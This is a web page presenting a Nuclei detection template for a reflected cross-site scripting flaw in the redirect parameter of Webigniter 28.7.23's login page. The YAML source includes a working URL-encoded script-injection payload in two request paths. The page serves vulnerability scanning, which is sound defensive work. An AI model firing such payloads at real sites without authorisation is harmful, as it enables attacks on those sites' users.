Skip to content
Nuclei Templates

Webigniter 28.7.23 - Cross-Site Scripting

ID: webigniter-xss

Severity: medium

Author: theamanrawat

Tags: xss,webigniter

Description

Section titled “Description”

The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ycsz3”>bn76w was submitted in the redirect parameter. This input was echoed unmodified in the application’s response. By using this Java Script injection, the attacker can trick a lot of users into visiting his dangerous URL which is reflected on the login form, before they log in, warning them that there is a problem with the login

YAML Source

Section titled “YAML Source”
id: webigniter-xss


info:
  name: Webigniter 28.7.23 - Cross-Site Scripting
  author: theamanrawat
  severity: medium
  description: |
    The value of the redirect request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ycsz3"><script>alert(1)</script>bn76w was submitted in the redirect parameter. This input was echoed unmodified in the application's response. By using this Java Script injection, the attacker can trick a lot of users into visiting his dangerous URL which is reflected on the login form, before they log in, warning them that there is a problem with the login
  reference:
    - https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/WEBIGniter/2023/WEBIGniter-28.7.23-XSS-Reflected
    - https://webigniter.net
  metadata:
    verified: true
    max-request: 2
  tags: xss,webigniter


http:
  - method: GET
    path:
      - '{{BaseURL}}/cms/login?redirect=cmsycsz3%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2fscript>bn76w'
      - '{{BaseURL}}/login?redirect=cmsycsz3%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2fscript>bn76w'


    stop-at-first-match: true


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<script>alert(document.domain)</script>"
          - "Webigniter"
        condition: and


      - type: word
        part: header
        words:
          - "text/html"


      - type: status
        status:
          - 200
# digest: 4a0a004730450221009e22f983946a712ea171f4ad09a5a11cf7696b0f84eeef92efa443ae707a836502206b720e7bef6f350a10abdf6efb7720170b3a554c906c4b5cdf0825368613fa24:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/other/webigniter-xss.yaml"

View on Github